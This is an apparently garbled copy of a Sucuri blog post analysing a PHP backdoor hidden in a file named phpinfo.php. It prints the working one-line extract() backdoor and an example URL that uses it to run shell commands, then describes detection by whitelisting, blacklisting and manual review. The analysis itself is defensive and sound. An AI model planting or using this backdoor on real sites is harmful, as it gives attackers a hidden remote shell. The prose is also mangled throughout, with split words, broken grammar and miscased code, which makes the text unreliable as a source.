PHP Backdoors:hidden with Clever use of Extract Function
February,Daniel Cid,Comments
When a site gets compromised, one thing we know for sure are that attackers love to leave malware that allows them access B Ack into the site; This type of malware is called a backdoor. This type of malware is named this because it allows for remote control of a compromised website Ppropriate authentication methods. Can update your site, change passwords, along with any of your admin procedures, and the backdoor would still be there Allowing unexpected access to an attacker.
Backdoors is also very hard to find because they don ' t has to being linked directly in the website, they can is very small And is easily confused with "normal" code. Some of them have passwords, Some is heavily encrypted/encoded and can is anywhere on your site, file system or database.
We have written extensively on website backdoors (generally in PHP), that allow for continuous reinfections and control of hacked websites.
You can read something more about backdoors on these links:
- Ask Sucuri:what about the backdoors?
- Ask Sucuri:non-alphanumeric backdoors
- hiding backdoors Using Cron
If you search for "backdoor" in our blog here, you'll find dozens of posts specifically around the subject.
PHP Extract Backdoor
As you can imagine, backdoors is something that get us very interested, and is a big part of our us. If we clean up a site and we miss just one backdoor, it means the site can get reinfected.
Recently while working in a client website, one of our security analysts, Ben Martin, found a very interesting backdoor th At leverages the extract PHP function. The backdoor is hidden on a file called phpinfo.php:
@extract ($_request); @die ($ctime ($atime));
As can see, it doesn ' t look very suspicious. It doesn ' t has any "eval", "exec", "system", "Assert" "Preg_replace" (with/e/) or any other common function th At allows for code execution. This makes most signature based malware detection and removal solutions useless. They won ' t find anything.
How can someone execute code by just leveraging extract, do you ask? If you are on the Extract manual page, it explains what it does:
extract -import variables into the current symbol table from an array
Basically it takes whatever array entries you has and creates variables for them. If you are thinking that doesn ' t look too bad or dangerous, if you are in this piece of the code, it certainly is:
It is extracting any content sent via GET or POST requests and creating variables for them. That means this in the next part of the code, where it executes ' die ' (exit) on $ctime ($atime), it's actually ex Ecuting whatever the attacker sends as "CTime" with "atime" as an argument.
Running Commands Via The Backdoor
Let me give an example, may make it a bit easier to follow. Let's say I am a bad guy and I want to execute ls-la to list all contents of a directory on a site I just hacked So I can upload this backdoor. All I needed to do are visit this URL using any browser:
Site.com/phpinfo.php?ctime=system&atime=ls-la
The extract function would take these variables and turn @die ($ctime ($atime)) , into @die (System ("Ls-la")); . See what powerful it is?
Now you can take the LS and turn into a cat, or echo, and many other commands to modify files. It's basically a full shell in there.
Protecting and detecting backdoors
As you can see, finding them are very hard. But these is some techniques that work very well:
- whitelisting –we know what's the good files look like. We have a large checksum set of all the core files used in WordPress, Joomla, oscommerce, Wiki, etc, etc s. We also has checksums for the most popular plugins, modules, extensions and themes. Know what is that gives us? It gives us a verification method of the core files. It gives us a to determine if they were modified, new files added, and we can safely validate the good ones.
- blacklisting –we also has a list with thousands of backdoors and their variations so We have collected over t He last few years.
- Anomaly Checks. When the a file is not in our whitelist (core files), and isn't in our blacklist, we anomaly checks. These checks is where all the functions/variables in a file is analyzed and manually inspected to see if they is a back Door. If It is, we modify our blacklists to catch them in the future. If not, it's another file added to our whitelist.
As can see, we use more then one method to detect and protect by mixing whitelisting + blacklisting, and our own Manua L analysis to find all the backdoors on a site. If you is trying to clean a compromised site by yourself, we recommend first overwriting all the files can (core file s, plugins, etc). of what is left and you have to manually analyze all the files to make sure they be clean.
What does you think? We would love to hear your ideas or methods for checking for backdoors.
PHP Backdoors:hidden with Clever use of Extract Function